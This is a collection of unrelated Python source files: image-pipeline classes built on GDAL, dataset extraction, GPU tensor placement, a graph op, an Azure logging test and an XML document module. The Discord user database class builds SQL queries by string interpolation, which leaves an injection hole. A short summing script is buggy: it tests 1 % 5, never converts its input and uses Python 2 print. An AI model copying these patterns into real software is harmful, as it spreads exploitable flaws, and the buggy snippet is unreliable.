is in the filesystem (in which case 'imageinput' is the path) or an
Image-class variable (in which case 'imageinput' is the variable name).
"""
def __init__(self, imageinput, name=None, verbose=False):
PipeSegment.__init__(self)
self.imageinput = imageinput
self.name = name
self.verbose = verbose
def load(self):
if type(self.imageinput) is Image:
return self.load_from_memory(self.imageinput, self.name, self.verbose)
elif type(self.imageinput) in (str, np.str_):
return self.load_from_disk(self.imageinput, self.name, self.verbose)
else:
raise Exception('! Invalid input type in LoadImage.')
class SaveImage(PipeSegment):
"""
Save an image to disk using GDAL.
"""
def __init__(self, pathstring, driver='GTiff', return_image=True,
save_projection=True, save_metadata=True, no_data_value=None):
super().__init__()
self.pathstring = pathstring
self.driver = driver
self.return_image = return_image
self.save_projection = save_projection
self.save_metadata = save_metadata
self.no_data_value = no_data_value
def transform(self, pin):
# Save image to disk
driver = gdal.GetDriverByName(self.driver)
datatype = gdal_array.NumericTypeCodeToGDALTypeCode(pin.data.dtype)
if datatype is None:
if pin.data.dtype in (bool, np.dtype('bool')):
datatype = gdal.GDT_Byte
else:
warnings.warn('! SaveImage did not find data type match; saving as float.')
datatype = gdal.GDT_Float32
dataset = driver.Create(self.pathstring, pin.data.shape[2], pin.data.shape[1], pin.data.shape[0], datatype)
for band in range(pin.data.shape[0]):
bandptr = dataset.GetRasterBand(band+1)
bandptr.WriteArray(pin.data[band, :, :])
if isinstance(self.no_data_value, str) \
and self.no_data_value.lower() == 'nan':
bandptr.SetNoDataValue(math.nan)
elif self.no_data_value is not None:
bandptr.SetNoDataValue(self.no_data_value)
bandptr.FlushCache()
if self.save_projection:
#First determine which projection system, if any, is used
proj_lens = [0, 0]
proj_keys = ['projection_ref', 'gcp_projection']
for i, proj_key in enumerate(proj_keys):
if proj_key in pin.metadata.keys():
proj_lens[i] = len(pin.metadata[proj_key])
if proj_lens[0] > 0 and proj_lens[0] >= proj_lens[1]:
dataset.SetGeoTransform(pin.metadata['geotransform'])
dataset.SetProjection(pin.metadata['projection_ref'])
elif proj_lens[1] > 0 and proj_lens[1] >= proj_lens[0]:
dataset.SetGCPs(pin.metadata['gcps'],
pin.metadata['gcp_projection'])
if self.save_metadata and 'meta' in pin.metadata.keys():
dataset.SetMetadata(pin.metadata['meta'])
dataset.FlushCache()
# Optionally return image
if self.driver.lower() == 'mem':
return dataset
elif self.return_image:
return pin
else:
return None
class ShowImage(PipeSegment):
"""
Display an image using matplotlib.
"""
def __init__(self, show_text=False, show_image=True, cmap='gray',
vmin=None, vmax=None, bands=None, caption=None,
width=None, height=None):
super().__init__()
self.show_text = show_text
self.show_image = show_image
self.cmap = cmap
self.vmin = vmin
self.vmax = vmax
self.bands = bands
self.caption = caption
self.width = width
self.height = height
def transform(self, pin):
if self.caption is not None:
print(self.caption)
if self.show_text:
print(pin)
if self.show_image:
# Select data, and format it for matplotlib
if self.bands is None:
image_formatted = pin.data
else:
image_formatted = pin.data[self.bands]
pyplot_formatted = np.squeeze(np.moveaxis(image_formatted, 0, -1))
if np.ndim(pyplot_formatted)==3 and self.vmin is not None and self.vmax is not None:
pyplot_formatted = np.clip((pyplot_formatted - self.vmin) / (self.vmax - self.vmin), 0., 1.)
# Select image size
if self.height is None and self.width is None:
rc = {}
elif self.height is None and self.width is not None:
rc = {'figure.figsize': [self.width, self.width]}
elif self.height is not None and self.width is None:
rc = {'figure.figsize': [self.height, self.height]}
else:
rc = {'figure.figsize': [self.width, self.height]}
# Show image
with plt.rc_context(rc):
plt.imshow(pyplot_formatted, cmap=self.cmap,
vmin=self.vmin, vmax=self.vmax)
plt.show()
return pin
class ImageStats(PipeSegment):
"""
Calculate descriptive statististics about an image
"""
def __init__(self, print_desc=True, print_props=True, return_image=True, return_props=False, median=True, caption=None):
super().__init__()
self.print_desc = print_desc
self.print_props = print_props
self.return_image = return_image
self.return_props = return_props
self.median = median
self.caption = caption
def transform(self, pin):
if self.caption is not None:
print(self.caption)
if self.print_desc:
print(pin)
print()
props = pd.DataFrame({
'min': np.nanmin(pin.data, (1,2)),
'max': np.nanmax(pin.data, (1,2)),
'mean': np.nanmean(pin.data, (1,2)),
'std': np.nanstd(pin.data, (1,2)),
'pos': np.count_nonzero(np.nan_to_num(pin.data, nan=-1.)>0, (1,2)),
'zero': np.count_nonzero(pin.data==0, (1,2)),
'neg': np.count_nonzero(np.nan_to_num(pin.data, nan=1.)<0, (1,2)),
'nan': np.count_nonzero(np.isnan(pin.data), (1,2)),
})
if self.median:
props.insert(3, 'median', np.nanmedian(pin.data, (1,2)))
if self.print_props:
print(props)
print()
if self.return_image and self.return_props:
return (pin, props)
elif self.return_image:
return pin
elif self.return_props:
return props
else:
return None
class MergeToStack(PipeSegment):
"""
Given an iterable of equal-sized images, combine
all of their bands into a single image.
"""
def __init__(self, master=0):
super().__init__()
self.master = master
def transform(self, pin):
# Make list of all the input bands
datalist = [imageobj.data for imageobj in pin]
# Create output image, using name and metadata from designated source
pout = Image(None, pin[self.master].name, pin[self.master].metadata)
pout.data = np.concatenate(datalist, axis=0)
return pout
class MergeToSum(PipeSegment):
"""
Combine an iterable of images by summing the corresponding bands.
Assumes that images are of equal size and have equal numbers of bands.
"""
def __init__(self, master=0):
super().__init__()
self.master = master
def transform(self, pin):
total = pin[self.master].data.copy()
for i in range(len(pin)):
if not i == self.master:
total += pin[i].data
return Image(total, pin[self.master].name, pin[self.master].metadata)
class MergeToProduct(PipeSegment):
"""
Combine an iterable of images by multiplying the corresponding bands.
Assumes that images are of equal size and have equal numbers of bands.
"""
def __init__(self, master=0):
super().__init__()
self.master = master
def transform(self, pin):
product = pin[self.master].data.copy()
for i in range(len(pin)):
if not i == self.master:
product *= pin[i].data
return Image(product, pin[self.master].name, pin[self.master].metadata)
class SelectItem(PipeSegment):
"""
Given an iterable, return one of its items. This is useful when passing
a list of items into, or out of, a custom class.
"""
def __init__(self, index=0):
super().__init__()
self.index = index
def transform(self, pin):
return pin[self.index]
class SelectBands(PipeSegment):
"""
Reorganize the bands in an image. This class can be used to
select, delete, duplicate, or reorder bands.
"""
def __init__(self, bands=[0]):
super().__init__()
if not hasattr(bands, '__iter__'):
bands = [bands]
self.bands = bands
def transform(self, pin):
return Image(pin.data[self.bands, :, :], pin.name, pin.metadata)
class Bounds(PipeSegment):
"""
Output the boundary coordinates [xmin, ymin, xmax, ymax] of an image.
Note: Requires the image to have an affine geotransform, not GCPs.
Note: Only works for a north-up image without rotation or shearing
"""
def transform(self, pin):
gt = pin.metadata['geotransform']
numrows = pin.data.shape[1]
numcols = pin.data.shape[2]
bounds = [gt[0], gt[3] + gt[5]*numrows, gt[0] + gt[1]*numcols, gt[3]]
return bounds
class Scale(PipeSegment):
"""
Scale data by a multiplicative factor.
"""
def __init__(self, factor=1.):
super().__init__()
self.factor = factor
def transform(self, pin):
return Image(self.factor * pin.data, pin.name, pin.metadata)
class Crop(PipeSegment):
"""
Crop image based on either pixel coordinates or georeferenced coordinates.
'bounds' is a list specifying the edges: [left, bottom, right, top]
"""
def __init__(self, bounds, mode='pixel'):
super().__init__()
self.bounds = bounds
self.mode = mode
def transform(self, pin):
row_min = self.bounds[3]
row_max = self.bounds[1]
col_min = self.bounds[0]
col_max = self.bounds[2]
if self.mode in ['pixel', 'p', 0]:
srcWin = [col_min, row_min,
col_max - col_min + 1, row_max - row_min + 1]
projWin = None
elif self.mode in ['geo', 'g', 1]:
srcWin = None
projWin = [col_min, row_min, col_max, row_max]
else:
raise Exception('! Invalid mode in Crop')
drivername = 'GTiff'
srcpath = '/vsimem/crop_input_' + str(uuid.uuid4()) + '.tif'
dstpath = '/vsimem/crop_output_' + str(uuid.uuid4()) + '.tif'
(pin * SaveImage(srcpath, driver=drivername))()
gdal.Translate(dstpath, srcpath, srcWin=srcWin, projWin=projWin)
pout = LoadImage(dstpath)()
pout.name = pin.name
if pin.data.dtype in (bool, np.dtype('bool')):
pout.data = pout.data.astype('bool')
driver = gdal.GetDriverByName(drivername)
driver.Delete(srcpath)
driver.Delete(dstpath)
return pout
class CropVariable(Crop):
"""
Like 'Crop', but window coordinates are accepted from another
PipeSegment at runtime instead of via initialization arguments.
"""
def __init__(self, mode='pixel'):
PipeSegment.__init__(self)
self.mode = mode
def transform(self, pin):
imagetocrop = pin[0]
self.bounds = pin[1]
return super().transform(imagetocrop)
class Resize(PipeSegment):
"""
Resize an image to the requested number of pixels
"""
def __init__(self, rows, cols):
super().__init__()
self.rows = rows
self.cols = cols
def transform(self, pin):
return self.resize(pin, self.rows, self.cols)
def resize(self, pin, rows, cols):
drivername = 'GTiff'
srcpath = '/vsimem/resize_input_' + str(uuid.uuid4()) + '.tif'
dstpath = '/vsimem/resize_output_' + str(uuid.uuid4()) + '.tif'
(pin * SaveImage(srcpath, driver=drivername))()
gdal.Translate(dstpath, srcpath, width=cols, height=rows)
pout = LoadImage(dstpath)()
pout.name = pin.name
if pin.data.dtype in (bool, np.dtype('bool')):
pout.data = pout.data.astype('bool')
driver = gdal.GetDriverByName(drivername)
driver.Delete(srcpath)
driver.Delete(dstpath)
return pout
class GetMask(PipeSegment):
"""
Extract a Boolean mask from an image band. NaN is assumed to be the
mask value, unless otherwise specified.
"""
def __init__(self, band=0, flag='nan'):
super().__init__()
self.band = band
self.flag = flag
def transform(self, pin):
if self.flag == 'nan':
data = np.expand_dims(np.invert(np.isnan(pin.data[self.band])), axis=0)
else:
data = np.expand_dims(pin.data[self.band]==self.flag, axis=0)
return Image(data, pin.name, pin.metadata)
class SetMask(PipeSegment):
"""
Given an image and a mask, apply the mask to the image.
More specifically, set the image's pixel value to NaN
(or other specified value) for every pixel where the
mask value is False.
"""
def __init__(self, flag=math.nan, band=None, reverse_order=False):
super().__init__()
self.flag = flag
self.band = band
self.reverse_order = reverse_order
def transform(self, pin):
if not self.reverse_order:
img = pin[0]
mask = pin[1]
else:
img = pin[1]
mask = pin[0]
mark = np.invert(np.squeeze(mask.data))
data = np.copy(img.data)
if self.band is None:
data[:, mark] = self.flag
else:
data[self.band, mark] = self.flag
return Image(data, img.name, img.metadata)
class InvertMask(PipeSegment):
"""
Sets all True values in a mask to False and vice versa.
"""
def transform(self, pin):
return Image(np.invert(pin.data), pin.name, pin.metadata)
|
import csv
import cv2
import numpy as np
import pandas as pd
import sys
from moviepy.editor import VideoFileClip
from DataGeneration import *
import concurrent.futures
def extract_process(args):
df = args['df']
basedir = args['basedir']
i = args['i']
for index, row in df.iterrows():
print('Process {} reading row nr {} ({})'.format(i, index, row['image']))
img_bgr = cv2.imread(basedir + row['image'])
img_small = cv2.resize(img_bgr[row['y_min']:row['y_max'], row['x_min']:row['x_max']], (64, 64))
if (row['label'] == 'car') or (row['label'] == 'truck'):
cv2.imwrite('dataset/vehicles/udacity/{}.jpg'.format(index), img_small)
# else:
# cv2.imwrite('dataset/non-vehicles/udacity/{}.jpg'.format(index), img_small)
def extract():
basedir = 'dataset/object-dataset/'
columns = ['image', 'x_min', 'y_min', 'x_max', 'y_max', 'x', 'label', 'color']
df = pd.read_csv(basedir+'labels.csv', sep=' ', names=columns, header=None)
print('Unique labels: ' + str(df['label'].unique()))
num_process = 4
split_size = df.shape[0] // num_process
process_arguments = [{'df': df[i*split_size:(i+1)*split_size], 'basedir': basedir, 'i': i}
for i in range(num_process)]
with concurrent.futures.ProcessPoolExecutor() as executor:
for i, exe in zip(range(num_process), executor.map(extract_process, process_arguments)):
print('Finished process {}'.format(i))
def main():
if False:
if (len(sys.argv) > 1) and isinstance(sys.argv[1], str):
filename = sys.argv[1]
else:
filename = 'test_video.mp4'
print('Processing file ' + filename)
clip1 = VideoFileClip('source_videos/' + filename)#.subclip(0,5)
gen = TrainingDataGenerator()
for frame in clip1.iter_frames():
gen.create_training_data(frame)
else:
print('Extracting images from Udacity database...')
extract()
if __name__ == "__main__":
main()
|
from abc import ABC, abstractmethod
from typing import List, Optional
import torch
from colossalai.utils import get_current_device
from colossalai.utils.memory import colo_device_memory_capacity
from colossalai.gemini.tensor_utils import colo_model_data_tensor_move_inline, colo_tensor_mem_usage
from colossalai.gemini.stateful_tensor import StatefulTensor
from colossalai.gemini.memory_tracer import MemStatsCollector
from typing import Type
class TensorPlacementPolicy(ABC):
def __init__(self, device: Optional[torch.device], mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
self.device: Optional[torch.device] = device
self.mem_stats_collector: Optional[MemStatsCollector] = mem_stats_collector
@abstractmethod
def evict_tensors(self, hold_cuda_tensor_list: List[StatefulTensor], **kwargs) -> None:
raise NotImplementedError
class CPUTensorPlacementPolicy(TensorPlacementPolicy):
def __init__(self, mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
super().__init__(torch.device('cpu'), mem_stats_collector=mem_stats_collector)
def evict_tensors(self, hold_cuda_tensor_list: List[StatefulTensor], **kwargs) -> int:
volume = 0
for t in hold_cuda_tensor_list:
colo_model_data_tensor_move_inline(t, self.device)
volume += t.payload.numel() * t.payload.element_size()
return volume
class CUDATensorPlacementPolicy(TensorPlacementPolicy):
def __init__(self, mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
assert torch.cuda.is_available(), 'Cannot use CUDATensorPlacementPolicy when CUDA is not available'
super().__init__(get_current_device(), mem_stats_collector=mem_stats_collector)
def evict_tensors(self, hold_cuda_tensor_list: List[StatefulTensor], **kwargs) -> int:
return 0
class AutoTensorPlacementPolicy(TensorPlacementPolicy):
def __init__(self, mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
super().__init__(None, mem_stats_collector=mem_stats_collector)
# model data will use 1-self._warmup_non_model_data_ratio CUDA memory in warmup phase
# TODO(ver217): make these args configurable
self._warmup_non_model_data_ratio: float = 0.8
self._steady_cuda_cap_ratio: float = 0.8
def evict_tensors(self,
hold_cuda_tensor_list: List[StatefulTensor],
cuda_demand: int = 0,
warmup: bool = True,
compute_list: List[StatefulTensor] = [],
compute_idx: int = 0,
**kwargs) -> int:
"""
Evict tensors from CUDA device.
Args:
hold_cuda_tensor_list (List[StatefulTensor]): the list of tensor in state of HOLD-like
cuda_demand (int, optional): the volume of data needed on cuda device. Defaults to 0.
warmup (bool, optional): a flag indicates whether in the phase of warmup. Defaults to True.
compute_list (List[StatefulTensor], optional): TODO. Defaults to [].
compute_idx (int, optional): the idx of computing device. Defaults to 0.
Raises:
RuntimeError:
Returns:
int: the volume of memory that is evicted
"""
cuda_capacity = colo_device_memory_capacity(get_current_device())
used_cuda_model_data = StatefulTensor.GST_MGR.total_mem['cuda']
if warmup:
# We designate a part of CUDA memory for model data in warmup iterations.
max_cuda_non_model_data_per_period = cuda_capacity * self._warmup_non_model_data_ratio
else:
# max non-model-data cuda memory consumption of this sampling moment and the next sampling moment.
max_cuda_non_model_data_per_period = self.mem_stats_collector.next_period_non_model_data_usage('cuda')
cuda_capacity *= self._steady_cuda_cap_ratio
total_cuda_model_data = cuda_capacity - max_cuda_non_model_data_per_period
avail_cuda_model_data = total_cuda_model_data - used_cuda_model_data
freed_cuda_model_data = 0
if avail_cuda_model_data < cuda_demand:
# Move cuda_demand - avail_cuda_model_data volume of tensors
# to_free_cuda_model_data = cuda_demand - avail_cuda_model_data
to_free_cuda_model_data = cuda_demand - avail_cuda_model_data
to_free_tensor_list = hold_cuda_tensor_list
if not warmup:
next_compute_idx = {t: len(compute_list) for t in hold_cuda_tensor_list}
for i in range(len(compute_list) - 1, compute_idx, -1):
if compute_list[i] in next_compute_idx:
next_compute_idx[compute_list[i]] = i
next_compute_idx = sorted(next_compute_idx.items(), key=lambda pair: pair[1], reverse=True)
to_free_tensor_list = [t for (t, idx) in next_compute_idx]
for t in to_free_tensor_list:
if freed_cuda_model_data >= to_free_cuda_model_data:
break
freed_cuda_model_data += t.payload_size
colo_model_data_tensor_move_inline(t, torch.device('cpu'))
if freed_cuda_model_data < to_free_cuda_model_data:
raise RuntimeError(
f"Adjust layout failed! No enough CUDA memory! Need {to_free_cuda_model_data}, freed {freed_cuda_model_data}"
)
return freed_cuda_model_data
class TensorPlacementPolicyFactory:
@staticmethod
def create(policy_name: str) -> Type[TensorPlacementPolicy]:
if policy_name == 'cpu':
return CPUTensorPlacementPolicy
elif policy_name == 'cuda':
return CUDATensorPlacementPolicy
elif policy_name == 'auto':
return AutoTensorPlacementPolicy
else:
raise TypeError(f"Unknown tensor placement policy {policy_name}")
|
n = input("Enter a number: ")
sum = 0
for i in range(1,n+1):
if ((i % 3)==0) or ((1 % 5)==0):
print i
sum = sum + i
print("The sum of 1 to %d, was %d" % (n, sum))
|
from database import Database
from database.users import User
class UserDatabase(Database):
def get_user(self, user: User):
query = (f"SELECT * from {self.database}.discord_users "
f"WHERE discord_id = {user.discord_id};")
with self:
self.cursor.execute(query)
result = self.cursor.fetchone()
if result:
return User(result[0], result[1])
else:
return False
def create_user(self, user: User):
if not self.get_user(user):
self.add_row(table=f'{self.database}.discord_users',
headers=['discord_id', 'clear_username'],
values=[user.discord_id, user.clear_username])
return
def update_user(self, user):
u = self.get_user(user)
if u != user:
exc = (f"UPDATE {self.database}.discord_users "
f"SET clear_username = '{user.clear_username}' "
f"WHERE clear_username = '{u.clear_username}';")
with self:
self.cursor.execute(exc)
|
from __future__ import absolute_import
import numpy as np
from .Node import Op
from ..gpu_links import reduce_mean
class ReduceMeanOp(Op):
def __init__(self, node_A, axes, keepdims=False, ctx=None):
super().__init__(ReduceMeanOp, [node_A], ctx)
if axes is not None:
if isinstance(axes, int):
axes = [axes]
self.axes = list(axes)
assert all(map(lambda x: isinstance(x, int), self.axes))
if keepdims is not None:
if keepdims is True or keepdims is False:
self.keepdims = [keepdims] * len(self.axes)
else:
keepdims = list(keepdims)
assert len(keepdims) == len(self.axes)
assert all(map(lambda x: isinstance(x, bool), keepdims))
self.keepdims = keepdims
def compute(self, input_vals, output_val, stream_handle=None):
assert self.axes is not None and self.keepdims is not None
if self.on_cpu:
if all(self.keepdims) or not any(self.keepdims):
output_val[:] = np.mean(input_vals[0].asnumpy(), axis=tuple(
self.axes), keepdims=self.keepdims[0])
else:
temp = input_vals[0].asnumpy()
for i in range(len(self.keepdims))[::-1]:
temp = np.mean(
temp, self.axes[i], keepdims=self.keepdims[i])
output_val[:] = temp
else:
reduce_mean(input_vals[0], output_val, self.axes, stream_handle)
def gradient(self, output_grad):
self.grad_set = False
from .MultiplyConst import mul_byconst_op
from .BroadcastShape import broadcast_shape_op
# Here we don't know how to calculate gradient since we don't have shape information
# The const is determined in infer_shape phase.
self.grad_node = mul_byconst_op(broadcast_shape_op(
output_grad, None, None, ctx=self.raw_ctx), None, ctx=self.raw_ctx)
return [self.grad_node]
def infer_shape(self, input_shapes):
assert self.axes is not None and self.keepdims is not None
assert len(input_shapes) == 1
input_shape = list(input_shapes[0])
mean_multiplier = 1
for i in range(len(self.axes)):
if self.axes[i] < 0:
self.axes[i] += len(input_shape)
assert 0 <= self.axes[i] < len(input_shape)
mean_multiplier *= input_shape[self.axes[i]]
input_shape[self.axes[i]] = 1 if self.keepdims[i] else 0
if hasattr(self, 'grad_node'):
self.grad_node.const_attr = 1.0 / mean_multiplier
self.grad_node.inputs[0].target_shape = tuple(input_shapes[0])
add_axes = []
for i in range(len(self.axes)):
if not self.keepdims[i]:
add_axes.append(self.axes[i])
self.grad_node.inputs[0].add_axes = add_axes
input_shape = [x for x in input_shape if x > 0]
if input_shape == []:
return (1,)
else:
return tuple(input_shape)
def forward_deduce_states(self, input_statuses, status, deduce_order):
assert len(input_statuses) == len(self.inputs)
if deduce_order:
order = input_statuses[0].order
if order is not None:
order = list(order)
dup_occur = 0
prev_dup = False
duplicate_candidate = self.axes + [-1]
for i, o in enumerate(order[::-1]):
if o in duplicate_candidate:
if not prev_dup:
dup_occur += 1
prev_dup = True
if o != -1:
order.pop(i)
else:
prev_dup = False
assert dup_occur <= 1, 'Duplicate dimension and reduce dimensions must be consecutive!'
for i in range(len(order)):
order[i] -= sum([x < order[i]
for j, x in enumerate(self.axes) if not self.keepdims[j]])
status.set_order(tuple(order))
else:
state, duplicate = input_statuses[0].get()
if state is not None:
state = dict(state)
for k in self.axes:
if k in state:
duplicate *= state.pop(k)
for k in sorted(state.keys()):
new_k = k - \
sum([x < k for j, x in enumerate(
self.axes) if not self.keepdims[j]])
if new_k != k:
state[new_k] = state.pop(k)
status.set_state(state, duplicate)
def backward_deduce_states(self, status, input_statuses, deduce_order):
assert len(input_statuses) == len(self.inputs)
if hasattr(self, 'grad_node') and not self.grad_set:
self.grad_node.ori_status = input_statuses[0]
self.grad_node.tar_status = status
self.grad_set = True
def reduce_mean_op(node, axes, keepdims=False, ctx=None):
"""Creates a node that represents np.mean(node_A, axis, keepdims).
Parameters:
----
node : Node
The Node needed to be averaged.
axes : int or list
The axis/axes needed to be averaged.
keepdims: bool or list
Whether to keep the dimension(s).
Returns:
----
A new Node instance created by Op.
"""
return ReduceMeanOp(node, axes, keepdims, ctx=ctx)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests the Azure logging collector."""
import unittest
import unittest.mock as mock
from azure.core import exceptions as az_exceptions
from dftimewolf.lib import state
from dftimewolf import config
from dftimewolf.lib.collectors import azure_logging
from dftimewolf.lib.containers.containers import AzureLogs
from dftimewolf.lib import errors
class AzureLogging(unittest.TestCase):
"""Tests for the Azure logging collector."""
def testInitialization(self):
"""Tests that the collector can be initialized."""
test_state = state.DFTimewolfState(config.Config)
azure_logging_collector = azure_logging.AzureLogsCollector(test_state)
self.assertIsNotNone(azure_logging_collector)
# pylint: disable=protected-access
def testSetup(self):
"""Tests that attributes are properly set during setup."""
test_state = state.DFTimewolfState(config.Config)
azure_logging_collector = azure_logging.AzureLogsCollector(test_state)
azure_logging_collector.SetUp(
subscription_id='55c5ff71-b3e2-450d-89da-cb12c1a38d87',
filter_expression='eventTimestamp ge \'2022-02-01\'',
profile_name='profile1')
self.assertEqual(
azure_logging_collector._subscription_id,
'55c5ff71-b3e2-450d-89da-cb12c1a38d87')
self.assertEqual(
azure_logging_collector._filter_expression,
'eventTimestamp ge \'2022-02-01\'')
self.assertEqual(
azure_logging_collector._profile_name, 'profile1')
@mock.patch('libcloudforensics.providers.azure.internal.common.GetCredentials') # pylint: disable=line-too-long
@mock.patch('azure.mgmt.monitor.MonitorManagementClient')
def testProcess(self, mock_monitor, mock_credentials):
"""Tests that the Azure monitor client is called with the correct args."""
# Create mock objects with required attributes - not mocking Azure objects
# directly as this leads to frail mocks based on version-dependent package
# names like azure.mgmt.monitor.v2015_04_01.models._models_py3.EventData.
mock_monitor_client = mock.MagicMock(spec=['activity_logs'])
mock_activity_logs_client = mock.MagicMock(spec=['list'])
mock_event_data = mock.MagicMock(spec=['as_dict'])
mock_monitor_client.activity_logs = mock_activity_logs_client
mock_activity_logs_client.list.return_value = iter([mock_event_data])
mock_event_data.as_dict.return_value = {'log_entry': 1}
mock_monitor.return_value = mock_monitor_client
mock_credentials.return_value = ('_', 'Credentials')
test_state = state.DFTimewolfState(config.Config)
azure_logging_collector = azure_logging.AzureLogsCollector(test_state)
azure_logging_collector.SetUp(
subscription_id='55c5ff71-b3e2-450d-89da-cb12c1a38d87',
filter_expression='eventTimestamp ge \'2022-02-01\'')
azure_logging_collector.Process()
mock_monitor.assert_called_with(
'Credentials', '55c5ff71-b3e2-450d-89da-cb12c1a38d87')
mock_activity_logs_client.list.assert_called_with(
filter='eventTimestamp ge \'2022-02-01\'')
self.assertTrue(test_state.GetContainers(AzureLogs))
# Ensure DFTimewolfError is raised when creds aren't found.
mock_credentials.side_effect = FileNotFoundError
with self.assertRaises(errors.DFTimewolfError):
azure_logging_collector.Process()
mock_credentials.side_effect = None
# Ensure DFTimewolfError is raised when Azure libs raise an exception.
mock_activity_logs_client.list.side_effect = (
az_exceptions.HttpResponseError)
with self.assertRaises(errors.DFTimewolfError):
azure_logging_collector.Process()
|
# -*- coding: utf-8 -*-
# Copyright (C) 2004-2013 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.SDG.XML.Document
#
# Purpose
# Model a XML document (i.e., prolog plus root element)
#
# Revision Dates
# 26-Aug-2004 (CT) Creation
# 17-Sep-2004 (CT) Doctest changed (added `%` to document text)
# 21-Oct-2004 (CT) Use `"` instead of `'` in output
# 5-Sep-2005 (CT) Derive from `XML.Node` instead of `XML.Element`
# 5-Sep-2005 (CT) `root_element` added and `insert` redefined to delegate
# to `root_element`
# 5-Sep-2005 (CT) Doctest `svg` added
# 6-Sep-2005 (CT) Doctest adapted to change of `_attr_values`
# 20-Sep-2005 (CT) Doctest with over-long attributes added
# 29-Nov-2007 (CT) Another doctest with over-long attributes added
# 29-Aug-2008 (CT) Import for `Elem_Type` added to fix doctest
# 26-Feb-2012 (MG) `__future__` imports added
# 18-Nov-2013 (CT) Change default `encoding` to `utf-8`
# ««revision-date»»···
#--
from _TFL import TFL
from _TFL.pyk import pyk
import _TFL.I18N
import _TFL._SDG._XML.Comment
import _TFL._SDG._XML.Doctype
import _TFL._SDG._XML.Element
import _TFL._SDG._XML.Elem_Type
import _TFL._SDG._XML.Node
class Document (TFL.SDG.XML.Node) :
"""Model a XML document (i.e., the root element)
>>> nl = chr (10)
>>> d = Document ( "Memo", "First line of text"
... , "& a second line of %text"
... , "A third line of %text &entity; including"
... , doctype = "memo"
... , description = "Just a test"
... )
>>> lines = list (d.formatted ("xml_format"))
>>> print (nl.join (lines))
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!DOCTYPE memo >
<!-- Just a test -->
<Memo>
First line of text
& a second line of %text
A third line of %text &entity; including
</Memo>
>>> d = Document ( "Memo", "First line of text"
... , "& a second line of %text"
... , "A third line of %text &entity; including"
... , doctype = TFL.SDG.XML.Doctype
... ("memo", dtd = "memo.dtd")
... , description = "Just a test"
... )
>>> print (nl.join (d.formatted ("xml_format")))
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!DOCTYPE memo SYSTEM "memo.dtd">
<!-- Just a test -->
<Memo>
First line of text
& a second line of %text
A third line of %text &entity; including
</Memo>
>>> s = Document ( TFL.SDG.XML.Element
... ( "svg"
... , x_attrs = dict
... ( viewBox = "10 60 450 260"
... , xmlns = "http://www.w3.org/2000/svg"
... , width = "100%"
... , height = "100%"
... )
... )
... , "..."
... , encoding = "UTF-8"
... , standalone = "no"
... )
>>> print (nl.join (s.formatted ("xml_format")))
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg height="100%" viewBox="10 60 450 260" width="100%"
xmlns="http://www.w3.org/2000/svg"
>
...
</svg>
>>> attrs = { "xmlns:fx" : "http://www.asam.net/xml/fbx"
... , "xmlns:ho" : "http://www.asam.net/xml"
... , "xmlns:flexray" : "http://www.asam.net/xml/fbx/flexray"
... , "xmlns:xsi"
... : "http://www.w3.org/2001/XMLSchema-instance"
... , "xsi:schemaLocation"
... : "http://www.asam.net/xml/fbx/all/fibex4multiplatform.xsd"
... , "VERSION" : "1.0.0a"
... }
>>> d = Document (TFL.SDG.XML.Element ("fx:FIBEX", x_attrs = attrs ))
>>> print (nl.join (d.formatted ("xml_format")))
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<fx:FIBEX VERSION="1.0.0a"
xmlns:flexray="http://www.asam.net/xml/fbx/flexray"
xmlns:fx="http://www.asam.net/xml/fbx"
xmlns:ho="http://www.asam.net/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.asam.net/xml/fbx/all/fibex4multiplatform.xsd"
>
</fx:FIBEX>
### Test for linebreaking in/between attribute values
>>> Elem_Type = TFL.SDG.XML.Elem_Type
>>> root_elem = Elem_Type ("foo", xmlns = "http://foo/bar")
>>> elem = Elem_Type ("bar", baz1 = None, baz2 = None, baz3 = None)
>>> root = root_elem ()
>>> child = elem ( baz1 = "This really is the value of baz1"
... , baz2 = "This really is the value of baz2"
... , baz3 = "This really is the value of baz3"
... )
>>> root.add (child)
>>> d = Document (root)
>>> d.write_to_xml_stream ()
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<foo xmlns="http://foo/bar">
<bar baz1="This really is the value of baz1"
baz2="This really is the value of baz2"
baz3="This really is the value of baz3"
>
</bar>
</foo>
"""
front_args = ("root_element", )
init_arg_defaults = dict \
( doctype = None
, encoding = "utf-8"
, root_element = None
, standalone = "yes"
, xml_version = 1.0
)
xml_format = """
<?xml version="%(xml_version)s" encoding="%(encoding)s" standalone="%(standalone)s"?>
%(::*doctype:)s
%(::*description:)s
%(::*root_element:)s
"""
_autoconvert = dict \
( doctype = lambda s, k, v : s._convert (v, TFL.SDG.XML.Doctype)
, root_element = lambda s, k, v : s._convert (v, TFL.SDG.XML.Element)
, standalone = lambda s, k, v :
{ "yes" : "yes"
, True : "yes"
, False : "no"
, "no" : "no"
} [v]
)
def formatted (self, format_name, * args, ** kw) :
for r in self.__super.formatted (format_name, * args, ** kw) :
if str != str and isinstance (r, str) :
### Only do this for Python2
r = r.encode (self.encoding, "xmlcharrefreplace")
yield r
# end def formatted
def insert (self, child, index = None, delta = 0) :
self.root_element.insert (child, index, delta)
# end def insert
# end class Document
if __name__ != "__main__" :
TFL.SDG.XML._Export ("*")
### __END__ TFL.SDG.XML.Document
|
import argparse
import glob
import os
import re
import sys
import numpy as np
import pandas as pd
from tqdm import tqdm
NUMBER_OF_ORPH_PER_INDEX = [1, 2, 3, 4, 5, 10, 20, 35, 50, 75, 100, 150, 200]
HIGH_T = 0.75
LOW_T = 0.25
sys.path.append(os.getcwd())
sys.path.append("/cs/usr/drordod/Desktop/project/proj_scwgbs")
from commons import files_tools
